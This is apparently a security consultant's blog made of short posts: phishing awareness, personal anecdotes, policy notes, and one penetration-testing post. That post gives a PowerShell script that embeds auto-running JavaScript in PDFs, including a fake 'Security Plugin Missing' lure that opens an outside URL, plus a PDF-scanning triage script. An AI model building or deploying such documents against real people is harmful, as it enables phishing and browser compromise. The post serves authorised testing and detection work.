Imaginary Friends or Foe?

I know it’s 2023. But no, “imaginary friends” emailing you are dangerous.

I’m not talking about “catfishing” or “To Catch a Predator,” and I’m definitely NOT talking about social media friends, influencer following, or bumping up your social’s followers here, although those are all valid “imaginary friends”. I’m pointing out the “old school” phishing scam emails where this invisible new digital friend wants to give you their fortune because you’re such a good person, befriends you, but in reality is asking for all your bank account info and any other items of value. Even better, you’ve gotten the “isn’t it oh so obvious your friend’s email has been hacked or spoofed” email and yet you click the email to read it. (BTW, it’s suspicious, so why do you click the link? Just delete it.)

PROTIP: If you use email message preview, it usually gives you some hints that it’s not a good email, and you can delete it quicker.

Ahhh, but here you are in 2023: you’ve clicked and automatically downloaded the morsel (worm, virus, etc.) your new friend has given you – it’s too late, right? Probably. Usually my “foe free” advice falls on deaf ears for any number of valid or invalid reasons. So yes, now you make a go for it – just throw your phone away, start that new Apple ID, and reorder all your credit cards … makes total sense.

I’ve personally reviewed or fixed so many work Outlook and Hotmail accounts and laptops over this one thing alone. At least once a week the commanding language is the norm: “Change your password! Don’t click that! Don’t open that odd attachment!” – yawn. With the built-in junk mail problems too, I know several people who simply avoid email. But avoiding email at work doesn’t work. (Well, maybe it does for some, but that’s another can of worms!)

I’m not pointing fingers here, just typing the truth, but the yearbook award of “most likely to succeed” goes to the C-suites opening up suspicious email and macro-enabling those Word documents that set “fire” to the company email and servers. Subsequently, email servers can be down for days! I’ve unplugged and disconnected infected machines, but then there’s the cloud/third-party email – sigh, good times.

If it’s too late, you need an “IT Superhero” to save the day. If you’re being preventative as a business, you need a plan. This includes a security policy updated yearly, an annual review/assessment, and ongoing end-user training.

Lessons Learned and Still Too Many Stories to Tell.

Internet imaginary friends are not fun! You don’t want your own story to tell or yet another bamboozled account. Although everyone can share a similar woeful story of this email foe, the new digital “imaginary friend” you met through a phishing email will steer you wrong in reality.

Here’s some golden friendly advice I’ll leave you with:

  1. FTC – How to Recognize, Avoid Phishing Scams, and What To Do
  2. SANS Security Awareness Training – Phishing
  3. “IT Crowd” clip.

+ | shew |

Cyber Defense Q & A

Meet James Shewmaker. James Shewmaker is the founder of and principal consultant at Bluenotch Corporation in Long Beach, California, which provides customized security services focusing on investigations, penetration testing, and analysis.

James authored and maintains the post-exploitation content in the SANS SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking course. Before becoming a SANS Certified Instructor in 2009, his creative technical work led him on many adventures, including “The Great Translator Invasion of 2003.” Read more at: https://cyber-defense.sans.org/blog/2018/10/22/shewmaker

James Shewmaker of Bluenotch Corporation.

Find me @jimshew

Instructor for SANS courses https://www.sans.org/instructors/james-shewmaker

THE 2017 CHECKLIST


  • Updated logo
  • New website
  • Yearly duty – corporation tax prep ( excuse me while I hibernate and drown in expense reports )
  • Make ten more checklists + reminder lists.

Happy New Year + Happy Groundhog Day.  You would be surprised how many *ahem* younger people do not know what I’m referring to when I say “alarm clock scene – Bill Murray Groundhog Day” ahhhh … and you guys can now “just Google it” on YouTube for instant gratification and add to your knowledge base category and tags – the cult epic movies that are referenced in other movies.  Circa 1993+ I had to record it on a VHS if I wanted to watch that scene again (and worse yet, only on a tube television – what mobile smart phone?!)

Yes.  I do wake up at 6am.  Groundhog Day can be classified as a real life documentary, right?

Groundhog Day Scene  HERE >

+ | shew |

Bye Bye 2015

In 2015, we drank a lot of Stumptown Coffee – roughly 900 homebrewed or take-away cups and thirty 12oz whole bean bags bought. It fueled a busy year as we worked around the world clock. We reminisced about the 2000s – everything from our involvement in Y2K radio reprogramming, The Great Translator Invasion, and the time the office got burglarized and the thieves took all the junk computers saved for an e-recycle drop-off (yes!) and stole all the bottled water (shortage / drought in California?!). Needless to say, we have accumulated a lot of stories over the years.

In the cliché of looking back, I realize that there are a lot of unfinished projects and lists left to complete in 2015 – two days left! Prioritizing critical events and client visits comes first over completing tasks like “You know < pause > I really need to update a wiki page!” or “Can we set up our twitter to amazon.com order?” And at the same time, those seem faster and easier to do in 10 minutes than what has been on our bucket lists. Anyone want to be an intern? Hah. I guess sipping coffee in 10 minutes became a priority and we had to put down the keyboard while drinking (fear of spillage). All jokes aside, we look forward to 2016. Happy New Year. + | shew |

+ I’ve been focused in 2015 on crafting malicious documents and VM forking.

It’s now been 10 years teaching at SANS. Check out the SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking course and its lead author, Stephen Sims.

+ | jim.shew |

PowerShell

When trying to solve a problem, I try to use PowerShell.

During a recent penetration test, I wanted to upload malicious DOC, XLS, and PDF files. I looked around my favorite exploit frameworks:

Metasploit | http://www.metasploit.com
Nishang | https://github.com/samratashok/nishang
Exploit-db | http://www.exploit-db.com/
Core IMPACT | http://www.coresecurity.com/core-impact-pro
Social Engineer Toolkit | https://github.com/trustedsec/social-engineer-toolkit

Unfortunately, the closest thing was an old Adobe Reader 8.x vintage embedded EXE exploit. I needed to write a payload into a PDF file that would be *interesting* (such as invoking a web browser). After a PDF API refresher, I decided to build it up from simple pieces. The subset of JavaScript that is available is only really supported in the Adobe readers; your mileage may vary with other readers.

app.launchURL('http://bluenotch.com/collector.php?ver='+app.viewerVersion,true);

After some searching, I found Didier Stevens’ work, realizing I should have looked there first. Didier has pdfid.py for summary analysis and mPDF.py to build it. I wanted to go the PowerShell route, however, and all I could find was PDFSharp used in PowerShell print-to-PDF examples. I was surprised that nobody had published something similar to this.

Between a sample PDFSharp cmdlet for merging PDFs (http://mikepfeiffer.net/2010/03/how-to-merge-pdf-files-using-powershell-and-pdfsharp/) and this example of creating JavaScript elements in a PDF in .NET (http://www.vo1dmain.info/pdfsharp-howto-inject-javascript-into-pdf-autoprinting-functionality), I had enough to work out a PowerShell solution. I still have Adobe’s JavaScript API specification for reference as well (http://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/js_api_reference.pdf).

A preliminary test script using the ideas above:

param(
    [string]$js = "app.alert('boom goes the reader '+app.reader);",
    [string]$msg = "Hello JS",
    [string]$filename = "C:\PDF\helloJS.pdf"
)

Add-Type -Path C:\pdf\PdfSharp-WPF.dll

$doc = New-Object PdfSharp.Pdf.PdfDocument
$doc.Info.Title = $js
$doc.Info.Creator = "@jimshew"
$page = $doc.AddPage()

# JavaScript action dictionary: /S /JavaScript with the script body in /JS
$dictjs = New-Object PdfSharp.Pdf.PdfDictionary
$dictjs.Elements["/S"] = New-Object PdfSharp.Pdf.PdfName ("/JavaScript")
$dictjs.Elements["/JS"] = New-Object PdfSharp.Pdf.PdfStringObject ($doc, $js)
$doc.Internals.AddObject($dictjs)

# Name tree leaf: /Names [ (EmbeddedJS) <reference to the action> ]
$dict = New-Object PdfSharp.Pdf.PdfDictionary
$pdfarray = New-Object PdfSharp.Pdf.PdfArray
$embeddedstring = New-Object PdfSharp.Pdf.PdfString ("EmbeddedJS")

$dict.Elements["/Names"] = $pdfarray
$pdfarray.Elements.Add($embeddedstring)
$pdfarray.Elements.Add($dictjs.Reference)
$doc.Internals.AddObject($dict)

# Hang the name tree off the catalog's /Names dictionary under /JavaScript
$dictgroup = New-Object PdfSharp.Pdf.PdfDictionary
$dictgroup.Elements["/JavaScript"] = $dict.Reference
$doc.Internals.Catalog.Elements["/Names"] = $dictgroup

$doc.Save($filename)

On opening the PDF (modern reader, no settings changed):

[Screenshot: blogpdfjspopup]

Great, now we can taunt the victim, but what about something more interesting, like making external requests?

$js = "app.alert('Security Plugin Missing, Launching installer');app.launchURL('http://bluenotch.com/pwn.php',true);"
$msg = "Security Plugin FAIL"
$filename = "C:\PDF\helloHTTP.pdf"

[Screenshot: blogpdfjspluginwarning]

Followed by:

[Screenshot: blogpdfredirectallow]

So it’s easy to see how this can be leveraged in a phishing or social engineering attack. In one of the recent assessments, the web portal that housed the PDFs was whitelisted, so it didn’t even prompt for the URL redirect! Now it’s ripe for a Browser Exploitation Framework (BeEF) hook or Metasploit browser autopwn.

I’m still exploring the modern PDF functionality to build creative payloads that work on modern readers. One of those features is the form submit functionality, used by the sample webug-reader.pdf in Origami (see work by Frédérick Raynal and Guillaume Delugré below).

I’ll be turning this into a proper PowerShell module soon (assuming my battery holds out during the next series of flights). For more on PDF hijinks, you may want to check out:

Origami – a framework for generating malicious PDFs:
http://www.security-labs.org/fred/docs/pacsec08/pacsec08-fr-gd-full.pdf
https://code.google.com/p/origami-pdf/

Online PDF analyzer:
http://wepawet.iseclab.org/index.php
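As a local first-pass check on a suspect file, here is an added example (not code from this post, nor from Didier Stevens’ tools) in Python: it tallies the same action keywords pdfid.py counts, decodes hex-escaped names so /J#61vaScript is not missed, and pulls the /JS literal out with balanced-parenthesis handling. The input is a constructed fragment shaped like the PDFSharp script’s output, not a real file.

```python
import re

# Constructed fragment, not a file from the post: the object layout the PDFSharp
# script emits, a /Names tree whose /JavaScript entry points at a /JS action.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Names << /JavaScript 4 0 R >> >> endobj\n"
    b"4 0 obj << /Names [(EmbeddedJS) 5 0 R] >> endobj\n"
    b"5 0 obj << /S /JavaScript /JS (app.alert('boom goes the reader '+app.reader);) >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# Keys that make a PDF act on open or reach outside the reader (pdfid.py's keyword family).
SUSPECT_KEYS = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/URI", "/SubmitForm")
NAME_RE = re.compile(rb"/([A-Za-z0-9#]+)")

def decode_name(raw: bytes) -> str:
    # PDF names may hex-escape bytes (/J#61vaScript == /JavaScript), which hides
    # the keyword from a plain grep; normalise before comparing.
    unescaped = re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), raw)
    return "/" + unescaped.decode("latin-1")

def count_keys(pdf: bytes) -> dict:
    counts = {k: 0 for k in SUSPECT_KEYS}
    for m in NAME_RE.finditer(pdf):
        name = decode_name(m.group(1))
        if name in counts:
            counts[name] += 1
    return counts

def extract_js(pdf: bytes) -> list:
    # Pull each /JS (...) literal, honouring balanced parentheses and backslash
    # escapes so app.alert('x') comes back whole instead of cut at the first ')'.
    scripts = []
    for m in re.finditer(rb"/JS\s*\(", pdf):
        i, depth, buf = m.end(), 1, bytearray()
        while i < len(pdf) and depth:
            c = pdf[i:i + 1]
            if c == b"\\":
                buf += pdf[i:i + 2]
                i += 2
                continue
            depth += (c == b"(") - (c == b")")
            if depth:
                buf += c
            i += 1
        scripts.append(buf.decode("latin-1"))
    return scripts

def triage(pdf: bytes) -> dict:
    counts = count_keys(pdf)
    return {"counts": counts, "scripts": extract_js(pdf),
            "suspicious": any(counts.values())}
```

Run `triage(open(path, "rb").read())` on a file; a non-zero /JavaScript, /JS, /OpenAction or /Launch count is the cue to open it only in a sandbox and look at the returned scripts.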

You probably want to check which app.launchURL destinations are already allowed; here is mine after checking the “remember” box on HelloHTTP.pdf:

[HKEY_USERS\S-1-5-21-3430783995-1949563973-3828160469-1001\Software\Adobe\Acrobat Reader\11.0\TrustManager\cDefaultLaunchURLPerms]

"tHostPerms"="version:2|akeo.ie:2|amazon.com:2|bluenotch.com:2|cdw.com:2|crucial.com:2"

+ | jimshew |

Summer of 1999

I was living in southern Idaho

and back then, it meant a requirement to travel. I was just starting a radio internship at a network of stations – format of rock / alt indie – and quickly headed to full-time work there. Yes, hours of fun, shows, tours, etc. But I still needed California vacation time. So yes, 60-80 hours a week in a closet-size studio, and visiting my home, Southern California, was a priority. Granted, Idaho has great white water rivers and white powder snow-capped mountains, but still – surf, sand, and retail sunshine were missing.

The gateway medium? Electronic plane tickets via Expedia and Hotmail. Both I didn’t have yet. So I signed up for a Hotmail account via Internet Explorer. Awwww … I miss those early Passport MSN Messenger IM and “one new message” bar sounds – nostalgia. Back to rewind, 1999: okay, so not everyone had Hotmail yet – mostly Yahoo or AOL, and Microsoft had recently acquired Hotmail. I still had a difficult time getting my third-choice account name. So brain-bending – one simple combo was available! Full first name and last initial. Two minutes later, done registering, and the welcome email arrives. Step two – I start to book Expedia … Need an account. My email is already registered?!? What? Okay …. “Forgot password.” Send. You didn’t fail to read the title here, summer of 1999, right? Just checking. Well, despite me not caring about the why of it being a registered email user account < look, I had late nights, was not yet a daily straight-up espresso drinker, and really did not think much of it. It was highly likely and logical that I started an account process and forgot to finish it one late night > I waited – the password was emailed to me… Some vacationy type password. Again, highly likely I made it that password – no red flag. Odd, right? But true. The password was five characters long. High five. I think about a month later, I forgot the password … Reset and added a “1”. Good job? Yes, this means more out-of-town trips were booked.

A couple of months later I got an email from the old Hotmail user letting me know it was once his, but he’s “moved on.” < bitter much > And I think we even might have mentioned my hijack of Expedia. Laugh. He had a similar name, lived in Washington state and was a computer nerd of some sort. I still recall his name, and he emailed me several years back again just to say hi … ahem, or try to get his email back. I just looked him up on LinkedIn – Senior Infosec Engineer, now lives in Utah. Look, it was a free Risk-game-type takeover. In the words of Seinfeld’s Kramer, “The Ukraine is weak.” + | shew |

Same year, same station, different channel role

It was my job, nay duty, to encourage user security awareness. My favorite technique was to “baggy pants” anyone leaving their email open. They would return to their desk and find an email (from themselves) declaring how cool they are and how their pants are the baggiest. Or a claim that their password was weak and they should change it … + | jimshew |

P.S. Irony – I was a victim of such ^^ email shenanigans ^^ . + | shew |

Cybersecurity thoughts on Presidents’ Day

In January 2008, the Bush Administration established the Comprehensive National Cybersecurity Initiative (CNCI). Recently, the Obama Administration released several notices on cybersecurity; below is an Executive Order.

By the authority vested in me as President by the Constitution and the laws of the United States of America, it is hereby ordered as follows: 

Section 1. Policy. In order to address cyber threats to public health and safety, national security, and economic security of the United States, private companies, nonprofit organizations, executive departments and agencies (agencies), and other entities must be able to share information related to cybersecurity risks and incidents and collaborate to respond in as close to real time as possible.

Continue reading here http://www.whitehouse.gov/the-press-office/2015/02/13/executive-order-promoting-private-sector-cybersecurity-information-shari

It is of note that during this White House Summit, held at Stanford University, the CEOs of Google, Yahoo, and Facebook were absent. Tim Cook, Apple CEO, attended.

SMALL TALK On a coffee + laptop observational side note: I was at a coffee bar on Saturday and there were only Macs everywhere. Yes, I did the 360 check while waiting for my Americano-latte. It’s like you could only stay and drink coffee if you owned an Apple product … and sign on the Square POS iPad (which, can we agree we love / hate the emailed receipt?!). So apparently, if I bring my ThinkPad, I might need to trek down to the other coffee shop down the street – they use an older-school Point of Sale system and have the most amazing hazelnut gelato. + | shew |

Five Year Plan

SMALL TALK I’m working on my five year plan, just trying to figure out the font. < that’s a line in the pilot episode of Chuck > I’ll be honest, that was the funniest line, made me laugh and I’ve used it as a tag line — but I never watched past the pilot episode (nor ever used Geek Squad). + | shew |

Since we’re on a television tangent … Just saw esxi console on Blacklist, now I *know* it’s a documentary. + | james.shew |